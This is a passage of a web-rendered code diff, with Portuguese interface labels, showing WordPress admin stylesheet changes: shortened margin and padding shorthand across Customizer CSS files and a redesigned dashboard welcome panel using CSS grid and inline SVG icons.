1113 1141 
  */
1114 1142
1115 1143 
 #customize-controls .customize-control-notifications-container { /* Scoped to #customize-controls for specificity over notification styles in common.css. */
1116 
-	margin: 4px 0 8px 0;
1144 
+	margin: 4px 0 8px;
1117 1145 
 	padding: 0;
1118 1146 
 	cursor: default;
1119 1147 
 }
 
@@ -1126,7 +1154,7 @@ p.customize-section-description {
1126 1154
1127 1155 
 #customize-controls .customize-control-notifications-container li.notice {
1128 1156 
 	list-style: none;
1129 
-	margin: 0 0 6px 0;
1157 
+	margin: 0 0 6px;
1130 1158 
 	padding: 9px 14px;
1131 1159 
 	overflow: hidden;
1132 1160 
 }
 
@@ -1428,7 +1456,7 @@ p.customize-section-description {
1428 1456 
 }
1429 1457
1430 1458 
 .customize-control-header .header-view:last-child {
1431 
-	margin-bottom: 0px;
1459 
+	margin-bottom: 0;
1432 1460 
 }
1433 1461
1434 1462 
 /* Convoluted, but 'outline' support isn't good enough yet */
 
@@ -1577,7 +1605,6 @@ p.customize-section-description {
1577 1605 
 	font-family: Consolas, Monaco, monospace;
1578 1606 
 	font-size: 12px;
1579 1607 
 	padding: 6px 8px;
1580 
-	-moz-tab-size: 2;
1581 1608 
 	-o-tab-size: 2;
1582 1609 
 	tab-size: 2;
1583 1610 
 }
 
@@ -1664,7 +1691,7 @@ p.customize-section-description {
1664 1691 
 	border-bottom: 1px solid #dcdcde;
1665 1692 
 	border-left: none;
1666 1693 
 	border-right: none;
1667 
-	margin: 0 0 15px 0;
1694 
+	margin: 0 0 15px;
1668 1695 
 	padding-right: 100px; /* Space for the button */
1669 1696 
 }
1670 1697 
 
@@ -1705,6 +1732,12 @@ p.customize-section-description {
1705 1732 
 	font-weight: 400;
1706 1733 
 }
1707 1734
1735 
+#customize-notifications-area .notification-message button.switch-to-editor {
1736 
+	display: block;
1737 
+	margin-top: 6px;
1738 
+	font-weight: 400;
1739 
+}
1740 
+
1708 1741 
 #customize-theme-controls .control-panel-themes > .accordion-section-title:after {
1709 1742 
 	display: none;
1710 1743 
 }
 
@@ -1723,6 +1756,12 @@ p.customize-section-description {
1723 1756 
 	z-index: 20;
1724 1757 
 }
1725 1758
1759 
+@media (prefers-reduced-motion: reduce) {
1760 
+	.control-panel-themes .customize-themes-full-container {
1761 
+		transition: none;
1762 
+	}
1763 
+}
1764 
+
1726 1765 
 @media screen and (min-width: 1670px) {
1727 1766 
 	.control-panel-themes .customize-themes-full-container {
1728 1767 
 		width: 82%;
 
@@ -1860,7 +1899,7 @@ p.customize-section-description {
1860 1899 
 }
1861 1900
1862 1901 
 .control-panel-themes .customize-themes-notifications .notice {
1863 
-	margin: 0 0 25px 0;
1902 
+	margin: 0 0 25px;
1864 1903 
 }
1865 1904
1866 1905 
 .customize-themes-full-container .customize-themes-section {
 
@@ -1874,7 +1913,7 @@ p.customize-section-description {
1874 1913
1875 1914 
 .control-section .customize-section-text-before {
1876 1915 
 	padding: 0 0 8px 15px;
1877 
-	margin: 15px 0 0 0;
1916 
+	margin: 15px 0 0;
1878 1917 
 	line-height: 16px;
1879 1918 
 	border-bottom: 1px solid #dcdcde;
1880 1919 
 	color: #50575e;
 
@@ -2095,7 +2134,7 @@ p.customize-section-description {
2095 2134 
 		position: relative;
2096 2135 
 		left: 0;
2097 2136 
 		width: 100%;
2098 
-		margin: 0 0 25px 0;
2137 
+		margin: 0 0 25px;
2099 2138 
 	}
2100 2139 
 	.filter-drawer {
2101 2140 
 		top: 46px;
 
@@ -2205,7 +2244,7 @@ p.customize-section-description {
2205 2244 
 		width: 26px;
2206 2245 
 		display: block;
2207 2246 
 		line-height: 2.3;
2208 
-		padding: 0 8px 0 8px;
2247 
+		padding: 0 8px;
2209 2248 
 		border-right: 1px solid #dcdcde;
2210 2249 
 	}
2211 2250 
 
@@ -2366,7 +2405,7 @@ body.cheatin h1 {
2366 2405 
 	color: #50575e;
2367 2406 
 	font-size: 24px;
2368 2407 
 	font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;
2369 
-	margin: 30px 0 0 0;
2408 
+	margin: 30px 0 0;
2370 2409 
 	padding: 0 0 7px;
2371 2410 
 }
2372 2411

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/customize-controls.min.css


+ 10 - 10
app/wp-admin/css/customize-nav-menus-rtl.css
Ver Arquivo 

@@ -12,7 +12,7 @@
12 12 
 #customize-theme-controls .customize-section-title-nav_menus-heading,
13 13 
 #customize-theme-controls .customize-section-title-menu_locations-heading,
14 14 
 #customize-theme-controls .customize-section-title-menu_locations-description {
15 
-	padding: 0 12px 0 12px;
15 
+	padding: 0 12px;
16 16 
 }
17 17
18 18 
 #customize-theme-controls .customize-control-description.customize-section-title-menu_locations-description {
 
@@ -101,7 +101,7 @@
101 101 
 .wp-customizer .menu-item-settings .description-thin {
102 102 
 	width: 100%;
103 103 
 	height: auto;
104 
-	margin: 0 0 8px 0;
104 
+	margin: 0 0 8px;
105 105 
 }
106 106
107 107 
 .wp-customizer .menu-item-settings input[type="text"] {
 
@@ -186,7 +186,7 @@
186 186 
 }
187 187
188 188 
 .wp-customizer .menu-settings dl {
189 
-	margin: 12px 0 0 0;
189 
+	margin: 12px 0 0;
190 190 
 	padding: 0;
191 191 
 }
192 192 
 
@@ -323,7 +323,7 @@
323 323 
 #available-menu-items .accordion-section-title .toggle-indicator:before {
324 324 
 	content: "\f140";
325 325 
 	display: block;
326 
-	padding: 1px 0px 1px 2px;
326 
+	padding: 1px 0 1px 2px;
327 327 
 	speak: never;
328 328 
 	border-radius: 50%;
329 329 
 	color: #787c82;
 
@@ -582,8 +582,8 @@
582 582 
 }
583 583
584 584 
 #available-menu-items .accordion-section-content .available-menu-items-list {
585 
-	margin: 0 0 45px 0;
586 
-	padding: 1px 15px 15px 15px;
585 
+	margin: 0 0 45px;
586 
+	padding: 1px 15px 15px;
587 587 
 }
588 588
589 589 
 #available-menu-items .accordion-section-content .available-menu-items-list:only-child { /* Types that do not support new items for the current user */
 
@@ -591,7 +591,7 @@
591 591 
 }
592 592
593 593 
 #new-custom-menu-item .accordion-section-content {
594 
-	padding: 0 15px 15px 15px;
594 
+	padding: 0 15px 15px;
595 595 
 }
596 596
597 597 
 #available-menu-items .menu-item-tpl {
 
@@ -691,7 +691,7 @@
691 691 
 	position: absolute;
692 692 
 	right: 0;
693 693 
 	top: 60px; /* below title div / search input */
694 
-	bottom: 0px; /* 100% height that still triggers lazy load */
694 
+	bottom: 0; /* 100% height that still triggers lazy load */
695 695 
 	max-height: none;
696 696 
 	width: 100%;
697 697 
 	padding: 1px 15px 15px;
 
@@ -796,7 +796,7 @@ body.adding-menu-items #customize-preview iframe {
796 796
797 797 
 #create-new-menu-submit {
798 798 
 	float: left;
799 
-	margin: 0 0 12px 0;
799 
+	margin: 0 0 12px;
800 800 
 }
801 801
802 802 
 .menu-delete-item {
 
@@ -806,7 +806,7 @@ body.adding-menu-items #customize-preview iframe {
806 806 
 }
807 807
808 808 
 .assigned-menu-locations-title p {
809 
-	margin: 0 0 8px 0;
809 
+	margin: 0 0 8px;
810 810 
 }
811 811
812 812 
 li.assigned-to-menu-location .menu-delete-item {

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/customize-nav-menus-rtl.min.css


+ 10 - 10
app/wp-admin/css/customize-nav-menus.css
Ver Arquivo 

@@ -11,7 +11,7 @@
11 11 
 #customize-theme-controls .customize-section-title-nav_menus-heading,
12 12 
 #customize-theme-controls .customize-section-title-menu_locations-heading,
13 13 
 #customize-theme-controls .customize-section-title-menu_locations-description {
14 
-	padding: 0 12px 0 12px;
14 
+	padding: 0 12px;
15 15 
 }
16 16
17 17 
 #customize-theme-controls .customize-control-description.customize-section-title-menu_locations-description {
 
@@ -100,7 +100,7 @@
100 100 
 .wp-customizer .menu-item-settings .description-thin {
101 101 
 	width: 100%;
102 102 
 	height: auto;
103 
-	margin: 0 0 8px 0;
103 
+	margin: 0 0 8px;
104 104 
 }
105 105
106 106 
 .wp-customizer .menu-item-settings input[type="text"] {
 
@@ -185,7 +185,7 @@
185 185 
 }
186 186
187 187 
 .wp-customizer .menu-settings dl {
188 
-	margin: 12px 0 0 0;
188 
+	margin: 12px 0 0;
189 189 
 	padding: 0;
190 190 
 }
191 191 
 
@@ -322,7 +322,7 @@
322 322 
 #available-menu-items .accordion-section-title .toggle-indicator:before {
323 323 
 	content: "\f140";
324 324 
 	display: block;
325 
-	padding: 1px 2px 1px 0px;
325 
+	padding: 1px 2px 1px 0;
326 326 
 	speak: never;
327 327 
 	border-radius: 50%;
328 328 
 	color: #787c82;
 
@@ -581,8 +581,8 @@
581 581 
 }
582 582
583 583 
 #available-menu-items .accordion-section-content .available-menu-items-list {
584 
-	margin: 0 0 45px 0;
585 
-	padding: 1px 15px 15px 15px;
584 
+	margin: 0 0 45px;
585 
+	padding: 1px 15px 15px;
586 586 
 }
587 587
588 588 
 #available-menu-items .accordion-section-content .available-menu-items-list:only-child { /* Types that do not support new items for the current user */
 
@@ -590,7 +590,7 @@
590 590 
 }
591 591
592 592 
 #new-custom-menu-item .accordion-section-content {
593 
-	padding: 0 15px 15px 15px;
593 
+	padding: 0 15px 15px;
594 594 
 }
595 595
596 596 
 #available-menu-items .menu-item-tpl {
 
@@ -690,7 +690,7 @@
690 690 
 	position: absolute;
691 691 
 	left: 0;
692 692 
 	top: 60px; /* below title div / search input */
693 
-	bottom: 0px; /* 100% height that still triggers lazy load */
693 
+	bottom: 0; /* 100% height that still triggers lazy load */
694 694 
 	max-height: none;
695 695 
 	width: 100%;
696 696 
 	padding: 1px 15px 15px;
 
@@ -795,7 +795,7 @@ body.adding-menu-items #customize-preview iframe {
795 795
796 796 
 #create-new-menu-submit {
797 797 
 	float: right;
798 
-	margin: 0 0 12px 0;
798 
+	margin: 0 0 12px;
799 799 
 }
800 800
801 801 
 .menu-delete-item {
 
@@ -805,7 +805,7 @@ body.adding-menu-items #customize-preview iframe {
805 805 
 }
806 806
807 807 
 .assigned-menu-locations-title p {
808 
-	margin: 0 0 8px 0;
808 
+	margin: 0 0 8px;
809 809 
 }
810 810
811 811 
 li.assigned-to-menu-location .menu-delete-item {

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/customize-nav-menus.min.css


+ 1 - 1
app/wp-admin/css/customize-widgets-rtl.css
Ver Arquivo 

@@ -82,7 +82,7 @@
82 82 
 }
83 83
84 84 
 .widget-inside {
85 
-	padding: 1px 10px 10px 10px;
85 
+	padding: 1px 10px 10px;
86 86 
 	border-top: none;
87 87 
 	line-height: 1.23076923;
88 88 
 }

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/customize-widgets-rtl.min.css


+ 1 - 1
app/wp-admin/css/customize-widgets.css
Ver Arquivo 

@@ -81,7 +81,7 @@
81 81 
 }
82 82
83 83 
 .widget-inside {
84 
-	padding: 1px 10px 10px 10px;
84 
+	padding: 1px 10px 10px;
85 85 
 	border-top: none;
86 86 
 	line-height: 1.23076923;
87 87 
 }

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/customize-widgets.min.css


+ 225 - 59
app/wp-admin/css/dashboard-rtl.css
Ver Arquivo 

@@ -111,56 +111,95 @@
111 111 
 	max-width: 100%;
112 112 
 }
113 113
114 
+/* Screen meta exception for when the "Dashboard" heading is missing or located below the Welcome Panel. */
115 
+.index-php #screen-meta-links {
116 
+	margin: 0 0 8px 20px;
117 
+}
118 
+
114 119 
 /* Welcome Panel */
115 120 
 .welcome-panel {
116 121 
 	position: relative;
117 122 
 	overflow: auto;
118 123 
 	margin: 16px 0;
119 
-	padding: 23px 10px 0;
120 
-	border: 1px solid #c3c4c7;
121 
-	box-shadow: 0 1px 1px rgba(0, 0, 0, 0.04);
122 
-	background: #fff;
123 
-	font-size: 13px;
124 
-	line-height: 1.7;
124 
+	background-color: #e7ebfd;
125 
+	font-size: 14px;
126 
+	line-height: 1.3;
127 
+	clear: both;
125 128 
 }
126 129
127 130 
 .welcome-panel h2 {
128 131 
 	margin: 0;
129 
-	font-size: 21px;
130 
-	font-weight: 400;
131 
-	line-height: 1.2;
132 
+	font-size: 48px;
133 
+	font-weight: 600;
134 
+	line-height: 1.25;
132 135 
 }
133 136
134 137 
 .welcome-panel h3 {
135 
-	margin: 1.33em 0 0;
136 
-	font-size: 16px;
138 
+	margin: 0;
139 
+	font-size: 20px;
140 
+	font-weight: 400;
141 
+	line-height: 1.4;
137 142 
 }
138 143
139 
-.welcome-panel li {
140 
-	font-size: 14px;
144 
+.welcome-panel p {
145 
+	font-size: inherit;
146 
+	line-height: inherit;
141 147 
 }
142 148
143 
-.welcome-panel p {
144 
-	color: #646970;
149 
+.welcome-panel-header {
150 
+	--about-header-image-width: 521px;
151 
+	--about-header-bg-width: calc(var(--about-header-image-width) * 0.55);
152 
+	--about-header-bg-offset-inline: 2rem;
153 
+
154 
+	position: relative;
145 155 
 }
146 156
147 
-.welcome-panel li a {
157 
+.welcome-panel-header-image {
158 
+	position: absolute;
159 
+	top: -1rem;
160 
+	left: var(--about-header-bg-offset-inline);
161 
+	bottom: 0;
162 
+	width: var(--about-header-bg-width);
163 
+	height: auto;
164 
+}
165 
+
166 
+.welcome-panel-header-image svg {
167 
+	width: 100%;
168 
+	height: auto;
169 
+}
170 
+
171 
+.welcome-panel-header a {
172 
+	color: inherit;
173 
+}
174 
+
175 
+.welcome-panel-header a:focus,
176 
+.welcome-panel-header a:hover {
177 
+	color: inherit;
148 178 
 	text-decoration: none;
149 179 
 }
150 180
151 
-.welcome-panel .about-description {
152 
-	font-size: 16px;
153 
-	margin: 0;
181 
+.welcome-panel-header a:focus,
182 
+.welcome-panel .welcome-panel-close:focus {
183 
+	outline-color: currentColor;
184 
+	outline-offset: 1px;
185 
+	box-shadow: none;
186 
+}
187 
+
188 
+.welcome-panel-header p {
189 
+	margin: 0.5em 0 0;
190 
+	font-size: 20px;
191 
+	line-height: 1.4;
154 192 
 }
155 193
156 194 
 .welcome-panel .welcome-panel-close {
157 195 
 	position: absolute;
158 196 
 	top: 10px;
159 197 
 	left: 10px;
160 
-	padding: 10px 21px 10px 15px;
198 
+	padding: 10px 24px 10px 15px;
161 199 
 	font-size: 13px;
162 200 
 	line-height: 1.23076923; /* Chrome rounding, needs to be 16px equivalent */
163 201 
 	text-decoration: none;
202 
+	z-index: 1; /* Raise above the version image. */
164 203 
 }
165 204
166 205 
 .welcome-panel .welcome-panel-close:before {
 
@@ -168,8 +207,23 @@
168 207 
 	top: 8px;
169 208 
 	right: 0;
170 209 
 	transition: all .1s ease-in-out;
210 
+	content: '\f335';
211 
+	font-size: 24px;
212 
+	color: #1d2327;
171 213 
 }
172 214
215 
+.welcome-panel .welcome-panel-close {
216 
+	color: #1d2327;
217 
+}
218 
+
219 
+.welcome-panel .welcome-panel-close:hover,
220 
+.welcome-panel .welcome-panel-close:focus,
221 
+.welcome-panel .welcome-panel-close:hover::before,
222 
+.welcome-panel .welcome-panel-close:focus::before {
223 
+	color: #2271b1;
224 
+}
225 
+
226 
+/* @deprecated 5.9.0 -- Button removed from panel. */
173 227 
 .wp-core-ui .welcome-panel .button.button-hero {
174 228 
 	margin: 15px 0 3px 13px;
175 229 
 	padding: 12px 36px;
 
@@ -179,54 +233,98 @@
179 233 
 }
180 234
181 235 
 .welcome-panel-content {
182 
-	margin-right: 13px;
236 
+	min-height: 400px;
237 
+	display: flex;
238 
+	flex-direction: column;
239 
+	justify-content: space-between;
240 
+}
241 
+
242 
+.welcome-panel-header {
243 
+	box-sizing: border-box;
244 
+	margin-right: auto;
245 
+	margin-left: auto;
183 246 
 	max-width: 1500px;
247 
+	width: 100%;
248 
+	padding: 48px 48px 80px 0;
249 
+	padding-left: calc(var(--about-header-bg-width) + (var(--about-header-bg-offset-inline) * 2));
184 250 
 }
185 251
186 252 
 .welcome-panel .welcome-panel-column-container {
253 
+	box-sizing: border-box;
254 
+	width: 100%;
187 255 
 	clear: both;
188 
-	position: relative;
256 
+	display: grid;
257 
+	z-index: 1;
258 
+	padding: 48px;
259 
+	grid-template-columns: repeat(3, 1fr);
260 
+	gap: 32px;
261 
+	align-self: flex-end;
262 
+	background: #fff;
189 263 
 }
190 264
191 
-.welcome-panel .welcome-panel-column {
192 
-	width: 32%;
193 
-	min-width: 200px;
194 
-	float: right;
265 
+[class*="welcome-panel-icon"] {
266 
+	height: 60px;
267 
+	width: 60px;
268 
+	background-color: #1d2327;
269 
+	background-position: center;
270 
+	background-size: 24px 24px;
271 
+	background-repeat: no-repeat;
272 
+	border-radius: 100%;
273 
+}
274 
+
275 
+.welcome-panel-column {
276 
+	display: grid;
277 
+	grid-template-columns: min-content 1fr;
278 
+	gap: 24px;
195 279 
 }
196 280
197 
-.welcome-panel .welcome-panel-column:first-child {
198 
-	width: 36%;
281 
+.welcome-panel-icon-pages {
282 
+	background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24'%3E%3Cpath fill='%23fff' d='M7 13.8h6v-1.5H7v1.5zM18 16V4c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v12c0 1.1.9 2 2 2h10c1.1 0 2-.9 2-2zM5.5 16V4c0-.3.2-.5.5-.5h10c.3 0 .5.2.5.5v12c0 .3-.2.5-.5.5H6c-.3 0-.5-.2-.5-.5zM7 10.5h8V9H7v1.5zm0-3.3h8V5.8H7v1.4zM20.2 6v13c0 .7-.6 1.2-1.2 1.2H8v1.5h11c1.5 0 2.7-1.2 2.7-2.8V6h-1.5z' /%3E%3C/svg%3E");
199 283 
 }
200 284
201 
-.welcome-panel-column p.hide-if-no-customize {
202 
-	margin-top: 10px;
285 
+.welcome-panel-icon-layout {
286 
+	background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24'%3E%3Cpath fill='%23fff' d='M18 5.5H6a.5.5 0 00-.5.5v3h13V6a.5.5 0 00-.5-.5zm.5 5H10v8h8a.5.5 0 00.5-.5v-7.5zm-10 0h-3V18a.5.5 0 00.5.5h2.5v-8zM6 4h12a2 2 0 012 2v12a2 2 0 01-2 2H6a2 2 0 01-2-2V6a2 2 0 012-2z' /%3E%3C/svg%3E");
203 287 
 }
204 288
205 
-.welcome-panel-column p {
206 
-	margin-top: 7px;
207 
-	color: #3c434a;
289 
+.welcome-panel-icon-styles {
290 
+	background-image: url("data:image/svg+xml,%3Csvg viewBox='0 0 24 24' xmlns='http://www.w3.org/2000/svg'%3E%3Cpath fill='%23fff' d='M12 4c-4.4 0-8 3.6-8 8v.1c0 4.1 3.2 7.5 7.2 7.9h.8c4.4 0 8-3.6 8-8s-3.6-8-8-8zm0 15V5c3.9 0 7 3.1 7 7s-3.1 7-7 7z' /%3E%3C/svg%3E");
208 291 
 }
209 292
293 
+/* @deprecated 5.9.0 -- Section removed from welcome panel. */
210 294 
 .welcome-panel .welcome-widgets-menus {
211 295 
 	line-height: 1.14285714;
212 296 
 }
213 297
298 
+/* @deprecated 5.9.0 -- Lists removed from welcome panel. */
214 299 
 .welcome-panel .welcome-panel-column ul {
215 300 
 	margin: 0.8em 0 1em 1em;
216 301 
 }
217 302
303 
+/* @deprecated 5.9.0 -- Lists removed from welcome panel. */
304 
+.welcome-panel li {
305 
+	font-size: 14px;
306 
+}
307 
+
308 
+/* @deprecated 5.9.0 -- Lists removed from welcome panel. */
309 
+.welcome-panel li a {
310 
+	text-decoration: none;
311 
+}
312 
+
313 
+/* @deprecated 5.9.0 -- Lists removed from welcome panel. */
218 314 
 .welcome-panel .welcome-panel-column li {
219 315 
 	line-height: 1.14285714;
220 316 
 	list-style-type: none;
221 317 
 	padding: 0 0 8px;
222 318 
 }
223 319
320 
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
224 321 
 .welcome-panel .welcome-icon {
225 322 
 	background: transparent !important;
226 323 
 }
227 324
228 325 
 /* Welcome Panel and Right Now common Icons style */
229 326
327 
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
230 328 
 .welcome-panel .welcome-icon:before,
231 329 
 #dashboard_right_now li a:before,
232 330 
 #dashboard_right_now li span:before,
 
@@ -245,47 +343,56 @@
245 343
246 344 
 /* Welcome Panel specific Icons styles */
247 345
346 
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
248 347 
 .welcome-panel .welcome-write-blog:before,
249 348 
 .welcome-panel .welcome-edit-page:before {
250 349 
 	content: "\f119";
251 350 
 	top: -3px;
252 351 
 }
253 352
353 
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
254 354 
 .welcome-panel .welcome-add-page:before {
255 355 
 	content: "\f132";
256 356 
 	top: -1px;
257 357 
 }
258 358
359 
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
259 360 
 .welcome-panel .welcome-setup-home:before {
260 361 
 	content: "\f102";
261 362 
 	top: -1px;
262 363 
 }
263 364
365 
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
264 366 
 .welcome-panel .welcome-view-site:before {
265 367 
 	content: "\f115";
266 368 
 	top: -2px;
267 369 
 }
268 370
371 
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
269 372 
 .welcome-panel .welcome-widgets-menus:before {
270 373 
 	content: "\f116";
271 374 
 	top: -2px;
272 375 
 }
273 376
377 
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
274 378 
 .welcome-panel .welcome-widgets:before {
275 379 
 	content: "\f538";
276 380 
 	top: -2px;
277 381 
 }
278 382
383 
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
279 384 
 .welcome-panel .welcome-menus:before {
280 385 
 	content: "\f163";
281 386 
 	top: -2px;
282 387 
 }
283 388
389 
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
284 390 
 .welcome-panel .welcome-comments:before {
285 391 
 	content: "\f117";
286 392 
 	top: -1px;
287 393 
 }
288 394
395 
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
289 396 
 .welcome-panel .welcome-learn-more:before {
290 397 
 	content: "\f118";
291 398 
 	top: -1px;
 
@@ -355,7 +462,7 @@
355 462 
 .community-events-errors [aria-hidden="true"],
356 463 
 .community-events-loading[aria-hidden="true"],
357 464 
 .community-events[aria-hidden="true"],
358 
-.community-events [aria-hidden="true"] {
465 
+.community-events form[aria-hidden="true"] {
359 466 
 	display: none;
360 467 
 }
361 468 
 
@@ -519,7 +626,7 @@ body #dashboard-widgets .postbox form .submit {
519 626
520 627 
 #dashboard_primary .rss-widget {
521 628 
 	font-size: 13px;
522 
-	padding: 0 12px 0;
629 
+	padding: 0 12px;
523 630 
 }
524 631
525 632 
 #dashboard_primary .rss-widget:last-child {
 
@@ -600,7 +707,7 @@ body #dashboard-widgets .postbox form .submit {
600 707 
 	color: #50575e;
601 708 
 	background: #f6f7f7;
602 709 
 	border-top: 1px solid #f0f0f1;
603 
-	padding: 10px 12px 6px 12px;
710 
+	padding: 10px 12px 6px;
604 711 
 }
605 712
606 713 
 #dashboard_right_now .sub h3 {
 
@@ -836,7 +943,7 @@ body #dashboard-widgets .postbox form .submit {
836 943 
 }
837 944
838 945 
 #activity-widget #the-comment-list .comment-item p.row-actions {
839 
-	margin: 4px 0 0 0;
946 
+	margin: 4px 0 0;
840 947 
 }
841 948
842 949 
 #activity-widget #the-comment-list .comment-item:first-child {
 
@@ -1103,6 +1210,18 @@ a.rsswidget {
1103 1210 
 /* =Media Queries
1104 1211 
 -------------------------------------------------------------- */
1105 1212
1213 
+@media only screen and (min-width: 1600px) {
1214 
+	.welcome-panel .welcome-panel-column-container {
1215 
+		display: flex;
1216 
+		justify-content: center;
1217 
+	}
1218 
+
1219 
+	.welcome-panel-column {
1220 
+		width: 100%;
1221 
+		max-width: 460px;
1222 
+	}
1223 
+}
1224 
+
1106 1225 
 /* one column on the dash */
1107 1226 
 @media only screen and (max-width: 799px) {
1108 1227 
 	#wpbody-content #dashboard-widgets .postbox-container {
 
@@ -1214,25 +1333,67 @@ a.rsswidget {
1214 1333 
 }
1215 1334
1216 1335 
 @media screen and (max-width: 870px) {
1217 
-	.welcome-panel .welcome-panel-column,
1218 
-	.welcome-panel .welcome-panel-column:first-child {
1219 
-		display: block;
1220 
-		float: none;
1221 
-		width: 100%;
1222 
-	}
1223 
-
1336 
+	/* @deprecated 5.9.0 -- Lists removed from welcome panel. */
1224 1337 
 	.welcome-panel .welcome-panel-column li {
1225 1338 
 		display: inline-block;
1226 1339 
 		margin-left: 13px;
1227 1340 
 	}
1228 1341
1342 
+	/* @deprecated 5.9.0 -- Lists removed from welcome panel. */
1229 1343 
 	.welcome-panel .welcome-panel-column ul {
1230 1344 
 		margin: 0.4em 0 0;
1231 1345 
 	}
1232 1346
1233 1347 
 }
1234 1348
1349 
+@media screen and (max-width: 1180px) and (min-width: 783px) {
1350 
+	.welcome-panel-column {
1351 
+		grid-template-columns: 1fr;
1352 
+	}
1353 
+
1354 
+	[class*="welcome-panel-icon"] {
1355 
+		display: none;
1356 
+	}
1357 
+}
1358 
+
1235 1359 
 @media screen and (max-width: 782px) {
1360 
+	.welcome-panel-header {
1361 
+		--about-header-bg-width: calc(var(--about-header-image-width) * 0.4);
1362 
+		--about-header-bg-offset-inline: 1rem;
1363 
+	}
1364 
+
1365 
+	.welcome-panel-header-image {
1366 
+		top: 2rem;
1367 
+	}
1368 
+
1369 
+	.welcome-panel .welcome-panel-column-container {
1370 
+		grid-template-columns: 1fr;
1371 
+		box-sizing: border-box;
1372 
+		padding: 32px;
1373 
+		width: 100%;
1374 
+	}
1375 
+
1376 
+	.welcome-panel .welcome-panel-column-content {
1377 
+		max-width: 520px;
1378 
+	}
1379 
+
1380 
+	/* Keep the close icon from overlapping the Welcome text. */
1381 
+	.welcome-panel .welcome-panel-close {
1382 
+		overflow: hidden;
1383 
+		text-indent: 40px;
1384 
+		white-space: nowrap;
1385 
+		width: 20px;
1386 
+		height: 20px;
1387 
+		padding: 5px;
1388 
+		top: 5px;
1389 
+		left: 5px;
1390 
+	}
1391 
+
1392 
+	.welcome-panel .welcome-panel-close::before {
1393 
+		top: 5px;
1394 
+		right: -35px;
1395 
+	}
1396 
+
1236 1397 
 	#dashboard-widgets h2 {
1237 1398 
 		padding: 12px;
1238 1399 
 	}
 
@@ -1275,23 +1436,28 @@ a.rsswidget {
1275 1436
1276 1437 
 /* Smartphone */
1277 1438 
 @media screen and (max-width: 600px) {
1278 
-	/* Keep the close icon from overlapping the Welcome text. */
1279 
-	.welcome-panel .welcome-panel-close {
1280 
-		overflow: hidden;
1281 
-		text-indent: 40px;
1282 
-		white-space: nowrap;
1283 
-		width: 20px;
1284 
-		height: 20px;
1285 
-		padding: 5px;
1286 
-		top: 5px;
1287 
-		left: 5px;
1439 
+	.welcome-panel-header {
1440 
+		padding: 32px 32px 64px;
1288 1441 
 	}
1289 1442
1290 
-	/* Make the close icon larger for tappability. */
1291 
-	.welcome-panel .welcome-panel-close:before {
1292 
-		font-size: 20px;
1293 
-		top: 5px;
1294 
-		right: -35px;
1443 
+	.welcome-panel-header-image {
1444 
+		display: none;
1445 
+	}
1446 
+}
1447 
+
1448 
+@media screen and (max-width: 480px) {
1449 
+	.welcome-panel-column {
1450 
+		gap: 16px;
1451 
+	}
1452 
+}
1453 
+
1454 
+@media screen and (max-width: 360px) {
1455 
+	.welcome-panel-column {
1456 
+		grid-template-columns: 1fr;
1457 
+	}
1458 
+
1459 
+	[class*="welcome-panel-icon"] {
1460 
+		display: none;
1295 1461 
 	}
1296 1462 
 }
1297 1463

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/dashboard-rtl.min.css


+ 225 - 59
app/wp-admin/css/dashboard.css
Ver Arquivo 

@@ -110,56 +110,95 @@
110 110 
 	max-width: 100%;
111 111 
 }
112 112
113 
+/* Screen meta exception for when the "Dashboard" heading is missing or located below the Welcome Panel. */
114 
+.index-php #screen-meta-links {
115 
+	margin: 0 20px 8px 0;
116 
+}
117 
+
113 118 
 /* Welcome Panel */
114 119 
 .welcome-panel {
115 120 
 	position: relative;
116 121 
 	overflow: auto;
117 122 
 	margin: 16px 0;
118 
-	padding: 23px 10px 0;
119 
-	border: 1px solid #c3c4c7;
120 
-	box-shadow: 0 1px 1px rgba(0, 0, 0, 0.04);
121 
-	background: #fff;
122 
-	font-size: 13px;
123 
-	line-height: 1.7;
123 
+	background-color: #e7ebfd;
124 
+	font-size: 14px;
125 
+	line-height: 1.3;
126 
+	clear: both;
124 127 
 }
125 128
126 129 
 .welcome-panel h2 {
127 130 
 	margin: 0;
128 
-	font-size: 21px;
129 
-	font-weight: 400;
130 
-	line-height: 1.2;
131 
+	font-size: 48px;
132 
+	font-weight: 600;
133 
+	line-height: 1.25;
131 134 
 }
132 135
133 136 
 .welcome-panel h3 {
134 
-	margin: 1.33em 0 0;
135 
-	font-size: 16px;
137 
+	margin: 0;
138 
+	font-size: 20px;
139 
+	font-weight: 400;
140 
+	line-height: 1.4;
136 141 
 }
137 142
138 
-.welcome-panel li {
139 
-	font-size: 14px;
143 
+.welcome-panel p {
144 
+	font-size: inherit;
145 
+	line-height: inherit;
140 146 
 }
141 147
142 
-.welcome-panel p {
143 
-	color: #646970;
148 
+.welcome-panel-header {
149 
+	--about-header-image-width: 521px;
150 
+	--about-header-bg-width: calc(var(--about-header-image-width) * 0.55);
151 
+	--about-header-bg-offset-inline: 2rem;
152 
+
153 
+	position: relative;
144 154 
 }
145 155
146 
-.welcome-panel li a {
156 
+.welcome-panel-header-image {
157 
+	position: absolute;
158 
+	top: -1rem;
159 
